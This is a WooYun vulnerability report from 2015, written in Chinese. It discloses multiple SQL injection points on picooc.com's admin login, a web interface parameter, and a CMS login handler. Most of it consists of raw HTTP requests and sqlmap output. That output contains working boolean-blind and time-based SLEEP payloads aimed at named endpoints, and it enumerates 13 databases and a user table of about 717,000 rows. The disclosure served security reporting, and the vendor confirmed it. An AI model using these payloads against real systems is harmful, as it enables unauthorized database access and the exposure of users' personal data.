当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0123773

漏洞标题:有品网多处SQL注入打包提交(涉及至少13个库影响71万+用户信息)

相关厂商:picooc.com

漏洞作者: 天地不仁 以万物为刍狗

提交时间:2015-07-01 09:49

修复时间:2015-08-15 09:54

公开时间:2015-08-15 09:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-01: 细节已通知厂商并且等待厂商处理中
2015-07-01: 厂商已经确认,细节仅向厂商公开
2015-07-11: 细节向核心白帽子及相关领域专家公开
2015-07-21: 细节向普通白帽子公开
2015-07-31: 细节向实习白帽子公开
2015-08-15: 细节向公众公开

简要描述:

天地本不仁 万物为刍狗
【HD】 以团队之名 以个人之荣耀 共建网络安全

详细说明:

1.
POST数据包:

POST /picooc/admin/login.php HTTP/1.1
Content-Length: 99
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.picooc.com:80/
Cookie: PHPSESSID=5rqj5m2e3vgj1d5uk82sp596q6; Hm_lvt_973df559cb578de9c3c4b8c03b1a03a0=1435657707,1435657720,1435657731,1435657733; Hm_lpvt_973df559cb578de9c3c4b8c03b1a03a0=1435657733; HMACCOUNT=50E0F9300006484F
Host: www.picooc.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
login=login&password=admin&username=admin


参数 username 可注入 这个点 比上一个点好跑

0.png


1.png


于是跑了下 picooc 数据库(96个表)

4.png


看见了个 user 的表 跑了下数量 结果看见了 717362 我想问下 那个 dayima_id 是那啥不?

3.png


POST parameter 'username' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] n
sqlmap identified the following injection points with a total of 531 HTTP(s) req
uests:
---
Parameter: username (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: login=login&password=admin&username=admin' AND 2537=2537 AND 'dGBa'
='dGBa
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: login=login&password=admin&username=admin' AND (SELECT * FROM (SELE
CT(SLEEP(5)))AWel) AND 'sutb'='sutb
---
[18:43:41] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.15
back-end DBMS: MySQL 5.0.12
[18:43:41] [INFO] fetching database names
[18:43:41] [INFO] fetching number of databases
[18:43:41] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[18:43:41] [INFO] retrieved: 13
[18:43:43] [INFO] retrieved: information_schema
[18:43:59] [INFO] retrieved: cdcol
[18:44:05] [INFO] retrieved: geo
[18:44:08] [INFO] retrieved: mysql
[18:44:13] [INFO] retrieved: performance_schema
[18:44:34] [INFO] retrieved: picooc
[18:44:43] [INFO] retrieved: picooc_bak
[18:44:56] [INFO] retrieved: picooc_bbs
[18:45:04] [INFO] retrieved: picooc_cms
[18:45:12] [INFO] retrieved: picooc_dev
[18:45:20] [INFO] retrieved: picooc_pms
[18:45:27] [INFO] retrieved: picooc_www
[18:45:33] [INFO] retrieved: test
available databases [13]:
[*] cdcol
[*] geo
[*] information_schema
[*] mysql
[*] performance_schema
[*] picooc
[*] picooc_bak
[*] picooc_bbs
[*] picooc_cms
[*] picooc_dev
[*] picooc_pms
[*] picooc_www
[*] test
[18:45:44] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\www.picooc.com'
[*] shutting down at 18:45:44


2.http://www.picooc.com/picooc/web_interface/?last_id=1&method=ditu&ver=99
参数 lasr_id 可注入

0.png


sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: last_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: last_id=1 AND 4846=4846&method=ditu&ver=99
---
[19:22:10] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.15
back-end DBMS: MySQL 5
[19:22:10] [INFO] fetching database names
[19:22:10] [INFO] fetching number of databases
[19:22:10] [INFO] resumed: 13
[19:22:10] [INFO] resumed: information_schema
[19:22:10] [INFO] resumed: cdcol
[19:22:10] [INFO] resumed: geo
[19:22:10] [INFO] resumed: m

漏洞证明:

3.POST数据包:

POST /cmsadmin/php/action.php HTTP/1.1
Content-Length: 106
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.picooc.com:80/
Cookie: PHPSESSID=5rqj5m2e3vgj1d5uk82sp596q6; Hm_lvt_973df559cb578de9c3c4b8c03b1a03a0=1435657707,1435657720,1435657731,1435657733; Hm_lpvt_973df559cb578de9c3c4b8c03b1a03a0=1435657733; HMACCOUNT=50E0F9300006484F
Host: www.picooc.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
action=login&password=-1&username=wsirjsba


参数 password 和 username 均可注入 这里以 password 演示

0.png


13个数据库 跑起来 太慢了 就不跑了

1.png


sqlmap identified the following injection points with a total of 422 HTTP(s) req
uests:
---
Parameter: password (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: action=login&password=-1' AND (SELECT * FROM (SELECT(SLEEP(5)))EBvX
) AND 'ZBYC'='ZBYC&username=wsirjsba
---
[18:38:14] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.15
back-end DBMS: MySQL 5.0.12
[18:38:14] [INFO] fetching database names
[18:38:14] [INFO] fetching number of databases
[18:38:14] [INFO] retrieved:
[18:38:14] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
13
[18:38:35] [INFO] retrieved: ii
[18:39:09] [INFO] retrieved:
[18:39:09] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[18:39:09] [INFO] retrieved:
[18:39:48] [ERROR] invalid character detected. retrying..
geo
[18:41:00] [INFO] retrieved: mysql
[18:42:47] [INFO] retrieved:

修复方案:

版权声明:转载请注明来源 天地不仁 以万物为刍狗@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-07-01 09:52

厂商回复:

谢谢

最新状态:

暂无